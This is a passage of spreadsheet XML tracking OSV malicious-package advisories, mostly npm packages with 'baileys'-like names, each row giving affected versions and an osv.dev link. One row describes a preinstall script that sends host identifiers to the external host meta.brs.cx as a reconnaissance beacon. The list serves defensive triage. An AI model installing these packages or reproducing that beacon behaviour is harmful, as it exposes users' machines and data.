          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q722" s="5" t="inlineStr"/>
      <c r="R722" s="5" t="inlineStr"/>
      <c r="S72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levvleys (npm), version(s): 2.1.0, 2.0.26, 2.0.25, 2.0.24, 2.0.23, 2.0.22, 2.0.21, 2.0.20, 2.0.19, 2.0.18, 2.0.17, 2.0.16, 2.0.13, 2.0.12, 2.0.11, 2.0.10, 2.0.9, 2.0.8, 2.0.6, 2.0.4.</t>
        </is>
      </c>
      <c r="T722" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17397</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C723" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17398</t>
        </is>
      </c>
      <c r="D723" s="5" t="inlineStr"/>
      <c r="E723" s="5" t="inlineStr"/>
      <c r="F723" s="5" t="inlineStr"/>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="inlineStr"/>
      <c r="I723" s="5" t="inlineStr"/>
      <c r="J723" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K723" s="5" t="inlineStr"/>
      <c r="L723" s="5" t="inlineStr">
        <is>
          <t>npm:lilys-baileys</t>
        </is>
      </c>
      <c r="M723" s="5" t="inlineStr"/>
      <c r="N723" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O723" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P723" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q723" s="5" t="inlineStr"/>
      <c r="R723" s="5" t="inlineStr"/>
      <c r="S72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lilys-baileys (npm), version(s): 1.3.3, 1.3.2.</t>
        </is>
      </c>
      <c r="T723" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17398</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C724" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17399</t>
        </is>
      </c>
      <c r="D724" s="5" t="inlineStr"/>
      <c r="E724" s="5" t="inlineStr"/>
      <c r="F724" s="5" t="inlineStr"/>
      <c r="G724" s="5" t="inlineStr"/>
      <c r="H724" s="5" t="inlineStr"/>
      <c r="I724" s="5" t="inlineStr"/>
      <c r="J724" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K724" s="5" t="inlineStr"/>
      <c r="L724" s="5" t="inlineStr">
        <is>
          <t>npm:monte-md-baileys</t>
        </is>
      </c>
      <c r="M724" s="5" t="inlineStr"/>
      <c r="N724" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O724" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P724" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q724" s="5" t="inlineStr"/>
      <c r="R724" s="5" t="inlineStr"/>
      <c r="S72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monte-md-baileys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T724" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17399</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C725" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17400</t>
        </is>
      </c>
      <c r="D725" s="5" t="inlineStr"/>
      <c r="E725" s="5" t="inlineStr"/>
      <c r="F725" s="5" t="inlineStr"/>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="inlineStr"/>
      <c r="I725" s="5" t="inlineStr"/>
      <c r="J725" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K725" s="5" t="inlineStr"/>
      <c r="L725" s="5" t="inlineStr">
        <is>
          <t>npm:my-baileys</t>
        </is>
      </c>
      <c r="M725" s="5" t="inlineStr"/>
      <c r="N725" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O725" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P725" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q725" s="5" t="inlineStr"/>
      <c r="R725" s="5" t="inlineStr"/>
      <c r="S72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my-baileys (npm), version(s): 1.0.5, 1.0.4, 1.0.3, 1.0.2, 1.0.1.</t>
        </is>
      </c>
      <c r="T725" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17400</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C726" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17401</t>
        </is>
      </c>
      <c r="D726" s="5" t="inlineStr"/>
      <c r="E726" s="5" t="inlineStr"/>
      <c r="F726" s="5" t="inlineStr"/>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="inlineStr"/>
      <c r="I726" s="5" t="inlineStr"/>
      <c r="J726" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K726" s="5" t="inlineStr"/>
      <c r="L726" s="5" t="inlineStr">
        <is>
          <t>npm:noverojs</t>
        </is>
      </c>
      <c r="M726" s="5" t="inlineStr"/>
      <c r="N726" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O726" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P726" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q726" s="5" t="inlineStr"/>
      <c r="R726" s="5" t="inlineStr"/>
      <c r="S72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noverojs (npm), version(s): 1.0.4, 1.0.1.</t>
        </is>
      </c>
      <c r="T726" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17401</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C727" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17402</t>
        </is>
      </c>
      <c r="D727" s="5" t="inlineStr"/>
      <c r="E727" s="5" t="inlineStr"/>
      <c r="F727" s="5" t="inlineStr"/>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="inlineStr"/>
      <c r="I727" s="5" t="inlineStr"/>
      <c r="J727" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K727" s="5" t="inlineStr"/>
      <c r="L727" s="5" t="inlineStr">
        <is>
          <t>npm:noxleyss</t>
        </is>
      </c>
      <c r="M727" s="5" t="inlineStr"/>
      <c r="N727" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O727" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P727" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q727" s="5" t="inlineStr"/>
      <c r="R727" s="5" t="inlineStr"/>
      <c r="S72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 (npm), version(s): 1.1.11, 1.1.8, 1.1.7, 1.1.6, 1.1.5, 1.1.4, 1.1.3, 1.1.2, 1.1.1, 1.1.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T727" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17402</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C728" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17403</t>
        </is>
      </c>
      <c r="D728" s="5" t="inlineStr"/>
      <c r="E728" s="5" t="inlineStr"/>
      <c r="F728" s="5" t="inlineStr"/>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="inlineStr"/>
      <c r="I728" s="5" t="inlineStr"/>
      <c r="J728" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K728" s="5" t="inlineStr"/>
      <c r="L728" s="5" t="inlineStr">
        <is>
          <t>npm:noxxleys</t>
        </is>
      </c>
      <c r="M728" s="5" t="inlineStr"/>
      <c r="N728" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O728" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P728" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q728" s="5" t="inlineStr"/>
      <c r="R728" s="5" t="inlineStr"/>
      <c r="S72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noxxleys (npm), version(s): 1.1.6, 1.1.5, 1.1.4, 1.1.2, 1.1.1, 1.1.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T728" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17403</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C729" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17404</t>
        </is>
      </c>
      <c r="D729" s="5" t="inlineStr"/>
      <c r="E729" s="5" t="inlineStr"/>
      <c r="F729" s="5" t="inlineStr"/>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="inlineStr"/>
      <c r="I729" s="5" t="inlineStr"/>
      <c r="J729" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K729" s="5" t="inlineStr"/>
      <c r="L729" s="5" t="inlineStr">
        <is>
          <t>npm:saturn-baileys</t>
        </is>
      </c>
      <c r="M729" s="5" t="inlineStr"/>
      <c r="N729" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O729" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P729" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q729" s="5" t="inlineStr"/>
      <c r="R729" s="5" t="inlineStr"/>
      <c r="S72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saturn-baileys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T729" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17404</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C730" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17405</t>
        </is>
      </c>
      <c r="D730" s="5" t="inlineStr"/>
      <c r="E730" s="5" t="inlineStr"/>
      <c r="F730" s="5" t="inlineStr"/>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="inlineStr"/>
      <c r="I730" s="5" t="inlineStr"/>
      <c r="J730" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K730" s="5" t="inlineStr"/>
      <c r="L730" s="5" t="inlineStr">
        <is>
          <t>npm:shadowmd</t>
        </is>
      </c>
      <c r="M730" s="5" t="inlineStr"/>
      <c r="N730" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O730" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P730" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q730" s="5" t="inlineStr"/>
      <c r="R730" s="5" t="inlineStr"/>
      <c r="S73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shadowmd (npm), version(s): 8.6.87.</t>
        </is>
      </c>
      <c r="T730" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17405</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C731" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17406</t>
        </is>
      </c>
      <c r="D731" s="5" t="inlineStr"/>
      <c r="E731" s="5" t="inlineStr"/>
      <c r="F731" s="5" t="inlineStr"/>
      <c r="G731" s="5" t="inlineStr"/>
      <c r="H731" s="5" t="inlineStr"/>
      <c r="I731" s="5" t="inlineStr"/>
      <c r="J731" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K731" s="5" t="inlineStr"/>
      <c r="L731" s="5" t="inlineStr">
        <is>
          <t>npm:spencer-baileys</t>
        </is>
      </c>
      <c r="M731" s="5" t="inlineStr"/>
      <c r="N731" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O731" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P731" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q731" s="5" t="inlineStr"/>
      <c r="R731" s="5" t="inlineStr"/>
      <c r="S73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spencer-baileys (npm), version(s): 1.0.4.</t>
        </is>
      </c>
      <c r="T731" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17406</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C732" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17407</t>
        </is>
      </c>
      <c r="D732" s="5" t="inlineStr"/>
      <c r="E732" s="5" t="inlineStr"/>
      <c r="F732" s="5" t="inlineStr"/>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="inlineStr"/>
      <c r="I732" s="5" t="inlineStr"/>
      <c r="J732" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K732" s="5" t="inlineStr"/>
      <c r="L732" s="5" t="inlineStr">
        <is>
          <t>npm:syncxbails</t>
        </is>
      </c>
      <c r="M732" s="5" t="inlineStr"/>
      <c r="N732" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O732" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P732" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q732" s="5" t="inlineStr"/>
      <c r="R732" s="5" t="inlineStr"/>
      <c r="S73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syncxbails (npm), version(s): 1.0.1, 1.0.0.</t>
        </is>
      </c>
      <c r="T732" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17407</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C733" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17408</t>
        </is>
      </c>
      <c r="D733" s="5" t="inlineStr"/>
      <c r="E733" s="5" t="inlineStr"/>
      <c r="F733" s="5" t="inlineStr"/>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="inlineStr"/>
      <c r="I733" s="5" t="inlineStr"/>
      <c r="J733" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K733" s="5" t="inlineStr"/>
      <c r="L733" s="5" t="inlineStr">
        <is>
          <t>npm:whalibmob</t>
        </is>
      </c>
      <c r="M733" s="5" t="inlineStr"/>
      <c r="N733" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O733" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P733" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q733" s="5" t="inlineStr"/>
      <c r="R733" s="5" t="inlineStr"/>
      <c r="S73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whalibmob (npm), version(s): 5.33.5, 5.33.4, 5.33.3, 5.33.2, 5.32.2, 5.32.1, 5.32.0, 5.30.0, 5.29.6, 5.29.5, 5.29.4, 5.29.3, 5.29.2, 5.29.1, 5.29.0, 5.28.0, 5.25.0, 5.24.2, 5.24.1, 5.24.0.</t>
        </is>
      </c>
      <c r="T733" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17408</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C734" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17409</t>
        </is>
      </c>
      <c r="D734" s="5" t="inlineStr"/>
      <c r="E734" s="5" t="inlineStr"/>
      <c r="F734" s="5" t="inlineStr"/>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="inlineStr"/>
      <c r="I734" s="5" t="inlineStr"/>
      <c r="J734" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K734" s="5" t="inlineStr"/>
      <c r="L734" s="5" t="inlineStr">
        <is>
          <t>npm:xvinleys</t>
        </is>
      </c>
      <c r="M734" s="5" t="inlineStr"/>
      <c r="N734" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O734" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P734" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q734" s="5" t="inlineStr"/>
      <c r="R734" s="5" t="inlineStr"/>
      <c r="S73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xvinleys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T734" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17409</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C735" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17410</t>
        </is>
      </c>
      <c r="D735" s="5" t="inlineStr"/>
      <c r="E735" s="5" t="inlineStr"/>
      <c r="F735" s="5" t="inlineStr"/>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="inlineStr"/>
      <c r="I735" s="5" t="inlineStr"/>
      <c r="J735" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K735" s="5" t="inlineStr"/>
      <c r="L735" s="5" t="inlineStr">
        <is>
          <t>npm:xzbails</t>
        </is>
      </c>
      <c r="M735" s="5" t="inlineStr"/>
      <c r="N735" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O735" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P735" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q735" s="5" t="inlineStr"/>
      <c r="R735" s="5" t="inlineStr"/>
      <c r="S73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xzbails (npm), version(s): 0.0.5, 0.0.4, 0.0.3.</t>
        </is>
      </c>
      <c r="T735" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17410</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C736" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17411</t>
        </is>
      </c>
      <c r="D736" s="5" t="inlineStr"/>
      <c r="E736" s="5" t="inlineStr"/>
      <c r="F736" s="5" t="inlineStr"/>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="inlineStr"/>
      <c r="I736" s="5" t="inlineStr"/>
      <c r="J736" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K736" s="5" t="inlineStr"/>
      <c r="L736" s="5" t="inlineStr">
        <is>
          <t>npm:xzvbails</t>
        </is>
      </c>
      <c r="M736" s="5" t="inlineStr"/>
      <c r="N736" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O736" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P736" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q736" s="5" t="inlineStr"/>
      <c r="R736" s="5" t="inlineStr"/>
      <c r="S73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xzvbails (npm), version(s): 0.0.1.</t>
        </is>
      </c>
      <c r="T736" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17411</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C737" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17412</t>
        </is>
      </c>
      <c r="D737" s="5" t="inlineStr"/>
      <c r="E737" s="5" t="inlineStr"/>
      <c r="F737" s="5" t="inlineStr"/>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="inlineStr"/>
      <c r="I737" s="5" t="inlineStr"/>
      <c r="J737" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K737" s="5" t="inlineStr"/>
      <c r="L737" s="5" t="inlineStr">
        <is>
          <t>npm:xzvexpzcbailey</t>
        </is>
      </c>
      <c r="M737" s="5" t="inlineStr"/>
      <c r="N737" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O737" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P737" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q737" s="5" t="inlineStr"/>
      <c r="R737" s="5" t="inlineStr"/>
      <c r="S73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xzvexpzcbailey (npm), version(s): 2.5.0, 2.1.0, 2.0.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T737" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17412</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C738" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17413</t>
        </is>
      </c>
      <c r="D738" s="5" t="inlineStr"/>
      <c r="E738" s="5" t="inlineStr"/>
      <c r="F738" s="5" t="inlineStr"/>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="inlineStr"/>
      <c r="I738" s="5" t="inlineStr"/>
      <c r="J738" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K738" s="5" t="inlineStr"/>
      <c r="L738" s="5" t="inlineStr">
        <is>
          <t>npm:yonzoffic-baileys</t>
        </is>
      </c>
      <c r="M738" s="5" t="inlineStr"/>
      <c r="N738" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O738" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P738" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q738" s="5" t="inlineStr"/>
      <c r="R738" s="5" t="inlineStr"/>
      <c r="S73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yonzoffic-baileys (npm), version(s): 8.6.90.</t>
        </is>
      </c>
      <c r="T738" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17413</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C739" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17414</t>
        </is>
      </c>
      <c r="D739" s="5" t="inlineStr"/>
      <c r="E739" s="5" t="inlineStr"/>
      <c r="F739" s="5" t="inlineStr"/>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="inlineStr"/>
      <c r="I739" s="5" t="inlineStr"/>
      <c r="J739" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K739" s="5" t="inlineStr"/>
      <c r="L739" s="5" t="inlineStr">
        <is>
          <t>npm:yonzofficial</t>
        </is>
      </c>
      <c r="M739" s="5" t="inlineStr"/>
      <c r="N739" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O739" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P739" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q739" s="5" t="inlineStr"/>
      <c r="R739" s="5" t="inlineStr"/>
      <c r="S73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yonzofficial (npm), version(s): 2.1.3, 2.1.2, 2.1.1, 2.1.0.</t>
        </is>
      </c>
      <c r="T739" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17414</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C740" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17415</t>
        </is>
      </c>
      <c r="D740" s="5" t="inlineStr"/>
      <c r="E740" s="5" t="inlineStr"/>
      <c r="F740" s="5" t="inlineStr"/>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="inlineStr"/>
      <c r="I740" s="5" t="inlineStr"/>
      <c r="J740" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K740" s="5" t="inlineStr"/>
      <c r="L740" s="5" t="inlineStr">
        <is>
          <t>npm:com.epi.e2e_test</t>
        </is>
      </c>
      <c r="M740" s="5" t="inlineStr"/>
      <c r="N740" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O740" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P740" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q740" s="5" t="inlineStr"/>
      <c r="R740" s="5" t="inlineStr"/>
      <c r="S740" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5a0c1068af335818f2b9d905f2d39ebe594f84a6c63e470877692554bc95103b)
package.json declares a preinstall script that runs index.js on npm install. index.js collects host identifiers (os.homedir(), os.hostname(), os.userInfo().username, dns.getServers(), current working directory) along with the contents of the package.json and POSTs them over HTTPS to the hardcoded external host meta.brs.cx. This behavior fires automatically on install with no user interaction, and the collected data is characteristic of dependency-confusion / internal-name reconnaissance beacons used to identify targets for follow-on attacks.
</t>
        </is>
      </c>
      <c r="T740" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17415</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C741" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17416</t>
        </is>
      </c>
      <c r="D741" s="5" t="inlineStr"/>
      <c r="E741" s="5" t="inlineStr"/>
      <c r="F741" s="5" t="inlineStr"/>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="inlineStr"/>
      <c r="I741" s="5" t="inlineStr"/>
      <c r="J741" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K741" s="5" t="inlineStr"/>
      <c r="L741" s="5" t="inlineStr">
        <is>
          <t>PyPI:friendly-greeting-tools</t>
        </is>
      </c>
      <c r="M741" s="5" t="inlineStr"/>
      <c r="N741" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
